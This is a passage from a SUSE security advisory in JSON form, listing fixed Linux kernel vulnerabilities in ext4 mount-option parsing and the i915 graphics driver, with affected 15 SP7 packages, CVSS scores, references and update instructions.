"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71123"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
